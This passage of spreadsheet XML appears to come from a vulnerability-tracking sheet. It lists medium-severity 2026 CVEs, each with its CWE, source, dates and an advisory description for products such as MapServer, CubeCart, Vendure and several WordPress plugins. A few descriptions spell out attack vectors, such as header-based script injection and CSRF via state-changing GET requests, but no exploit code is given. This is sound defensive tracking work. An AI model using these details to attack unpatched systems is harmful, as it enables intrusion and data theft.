      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>The Motors – Car Dealership &amp; Classified Listings Plugin plugin for WordPress is vulnerable to unauthorized access of data due to missing authorization checks in mvl_ajax_dealer_load_cars() function in all versions up to, and including, 1.4.120. This makes it possible for unauthenticated attackers to retrieve draft, pending, private, and future car listings belonging to arbitrary users.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16750</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54355</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>MapServer is a system for developing web-based GIS applications. From 6.0 until 8.6.4, MapServer's OpenLayers HTML output for SERVICE=WMS&amp;REQUEST=GetMap&amp;FORMAT=application/openlayers reflects an attacker-controlled X-Forwarded-Host value received as HTTP_X_FORWARDED_HOST through msBuildOnlineResource(), processLine(), and the [mapserv_onlineresource] substitution in src/maputil.c and src/maptemplate.c without escaping it for a single-quoted JavaScript string. When the deployment trusts the forwarded header and does not configure a fixed ows_onlineresource or MS_ONLINERESOURCE value, embedded single quotes can escape the generated URL string. An unauthenticated attacker can craft a URL that executes arbitrary JavaScript in the MapServer site origin when opened by a victim, enabling access to sessions or tokens, same-origin data and requests, and actions as the victim. This issue is fixed in version 8.6.4.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54355</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54594</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-799</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>OmniBlocks is a monorepo for the OmniBlocks project. Prior to the June 6, 2026 workflow remediation, .github/workflows/disc.yml runs for the issues opened event and the issues edited event and invokes the createDiscussion mutation whenever an issue is classified as off-topic, without recording that the issue was already converted or otherwise suppressing duplicate runs. A user who creates one off-topic issue and repeatedly edits its description before conversion completes can therefore cause multiple discussions to be created for the same issue, producing discussion spam and additional moderation work. This issue is fixed with commit 627e0f0a16a7d74b09128106b57dd7e85d2545df.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54594</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54604</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-758, CWE-908</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>OpenSlide is a C library for reading whole slide image files. Prior to 4.0.1, a behavior change in libtiff 4.7.1 causes the indirect TIFF tile path in src/openslide-decode-tiff.c and _openslide_tiff_read_tile() to request a full-height destination for a partial bottom tile row, allowing uninitialized heap memory to enter pixel data returned by openslide_read_region(). A crafted but valid slide can trigger the issue in TIFF-based formats other than Hamamatsu NDPI when a network service renders attacker-provided slides. Successful extraction depends on pixel transparency handling and recompression, OpenSlide with libtiff 4.7.0 or earlier is not affected, and official binary builds 4.0.0.10 and 4.0.0.11 are affected. This issue is fixed in OpenSlide 4.0.1 and official binary build 4.0.0.12.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54604</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54642</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the reset_id download-counter action and delete_card stored-payment-card action in admin/sources/orders.index.inc.php use state-changing GET requests and are omitted from the protection map in admin/skins/default/csrf.inc.php. A remote attacker can induce an authenticated administrator to issue one of these requests without a validated session token, causing unintended resets of electronic download usage counters or deletion of stored customer payment-card tokens. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54642</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54907</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>Caddy Proxy Manager is a web interface for managing Caddy Server reverse proxies and certificates. Prior to 1.5.1, Caddy Proxy Manager enables email and password self-registration by default at /api/auth/sign-up/email, allowing an unauthenticated remote actor to create an active account with the user role without administrator approval. The user role cannot view or modify proxy data, so the direct impact is limited to unauthorized creation of low-privilege accounts. The fixed configuration in src/lib/config.ts and src/lib/auth-server.ts requires AUTH_ALLOW_SELF_REGISTRATION=true before the authentication library's disableSignUp control permits sign-up. This issue is fixed in version 1.5.1.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54907</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54918</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-15, CWE-829, CWE-918</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. In the affected repository revisions, NETBOX_DT_LIBRARY_URL in tests/test_configuration.py is a free-form tracked constant that an unauthenticated pull-request author can change before the validation test harness runs. During pytest collection, tests/definitions_test.py passes the value to Repo.clone_from and create_remote("upstream").fetch(), causing blind Git smart-HTTP requests to an attacker-selected host or loading attacker-controlled tests/known-*.json validation caches. The blind request cannot set arbitrary metadata-service headers or return response bodies, and this path does not execute remote Git hooks, but substituted known data can bypass slug, module, and rack uniqueness validation. This vulnerability is fixed in commit 8980c690097e92f5028c7e6df402b327d827ecd5.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54918</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63461</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/core</t>
        </is>
      </c>
      <c r="M319" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, the public Shop API products, collections, and facets queries combine mandatory visibility guards with caller-supplied filters using the caller-controlled filterOperator. When filterOperator is OR, a predicate matching a hidden entity can bypass the Product.enabled, Collection.isPrivate, or Facet.isPrivate guard. An unauthenticated caller can therefore retrieve disabled products and private collections or facets. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63461</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66575</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in King Addons for Elementor &lt;= 51.1.81 versions.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66575</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66676</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Easy Invoice &lt;= 2.3.8 versions.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66676</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71568</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>74b3a70d-cca6-4d34-9789-e83b222ae3be</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>In BMCtest, Ironic is started without authentication and TLS for the duration of the test. Exploiting the problem requires winning the race with bmctest itself, which reduces the attack window and significantly increases its complexity.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71568</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74000</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Contributor Broken Access Control in Simple Membership &lt;= 4.8.2 versions.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74000</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74002</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Booking Calendar &lt;= 11.7 versions.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74002</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74017</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in User Registration &lt;= 5.2.7 versions.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74017</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78296</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Insufficient Verification of Data Authenticity vulnerability in WP ManageNinja LLC FluentAuth allows Identity Spoofing.
This issue affects FluentAuth: from n/a through 2.1.2.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78296</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78528</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in BerqWP &lt;= 4.1.15 versions.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78528</t>
        </is>
      </c>
